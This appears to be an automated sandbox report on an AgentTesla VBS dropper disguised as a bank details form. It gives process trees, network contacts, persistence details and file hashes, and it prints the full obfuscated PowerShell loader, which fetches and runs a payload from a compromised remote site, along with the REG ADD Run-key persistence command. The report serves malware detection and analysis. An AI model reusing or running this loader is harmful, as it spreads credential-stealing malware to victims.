Malware Analysis Report

2024-11-30 07:20

Sample ID 240603-hj7k5sfc2t
Target Bank_Details_Form.vbs
SHA256 d16ea5d6d40c9020b99032eaefab9b62f3c63bae12d24103a6b10ac5a2dcd34c
Tags
agenttesla keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d16ea5d6d40c9020b99032eaefab9b62f3c63bae12d24103a6b10ac5a2dcd34c

Threat Level: Known bad

The file Bank_Details_Form.vbs was found to be: Known bad.

Malicious Activity Summary

agenttesla keylogger persistence spyware stealer trojan

AgentTesla

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 06:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 06:47

Reported

2024-06-03 06:49

Platform

win7-20240220-en

Max time kernel

143s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bank_Details_Form.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)" C:\Windows\SysWOW64\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2560 set thread context of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1984 wrote to memory of 1036 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1036 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1036 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1036 wrote to memory of 2544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1036 wrote to memory of 2544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1036 wrote to memory of 2544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1036 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1036 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1036 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1036 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2560 wrote to memory of 2456 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 2456 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 2456 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 2456 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2560 wrote to memory of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2560 wrote to memory of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2560 wrote to memory of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2560 wrote to memory of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2560 wrote to memory of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 776 wrote to memory of 2452 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 776 wrote to memory of 2452 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 776 wrote to memory of 2452 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 776 wrote to memory of 2452 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2452 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2452 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2452 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2452 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bank_Details_Form.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.innovativebuildingsolutions.in udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp

Files

memory/1036-4-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

memory/1036-5-0x000000001B620000-0x000000001B902000-memory.dmp

memory/1036-6-0x00000000022C0000-0x00000000022C8000-memory.dmp

memory/1036-7-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1036-8-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1036-9-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1036-11-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1036-10-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JQJZIJ3CO6XDSRHZNX19.temp

MD5 c7dea2eb516df78f4599bd2ee8e96725
SHA1 5a04043862d5f48115ab816c7c2c4b768ebc6741
SHA256 fec7bd0772416d47aec0a2c1780ada5234731df0eabb4074712bc4a0d51b8750
SHA512 ada7ad287d8da7a21d8289291a4ac474251027c99ee11f99e5386498265df4ca04117899e8586a59b090f08d82e415041436773c72521464096c1e0245c6f97a

C:\Users\Admin\AppData\Roaming\Skrmet.Kli

MD5 9916e5a5f7afe8c1f861f93999a875f3
SHA1 8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc
SHA256 97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df
SHA512 30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc

memory/1036-17-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/2560-18-0x0000000006720000-0x000000000A37C000-memory.dmp

memory/1036-19-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

memory/776-33-0x00000000008E0000-0x0000000001942000-memory.dmp

memory/776-34-0x00000000008E0000-0x0000000000920000-memory.dmp

memory/1036-35-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 06:47

Reported

2024-06-03 06:49

Platform

win10v2004-20240426-en

Max time kernel

148s

Max time network

154s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bank_Details_Form.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)" C:\Windows\SysWOW64\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4432 set thread context of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1736 wrote to memory of 4652 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 4652 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4652 wrote to memory of 4516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4652 wrote to memory of 4516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4652 wrote to memory of 4432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4652 wrote to memory of 4432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4652 wrote to memory of 4432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4432 wrote to memory of 4556 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4432 wrote to memory of 4556 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4432 wrote to memory of 4556 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4432 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4432 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4432 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4432 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4432 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2976 wrote to memory of 5008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2976 wrote to memory of 5008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2976 wrote to memory of 5008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5008 wrote to memory of 228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5008 wrote to memory of 228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5008 wrote to memory of 228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bank_Details_Form.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. 
ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH 
SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa 
Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 www.innovativebuildingsolutions.in udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 98.58.21.103.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
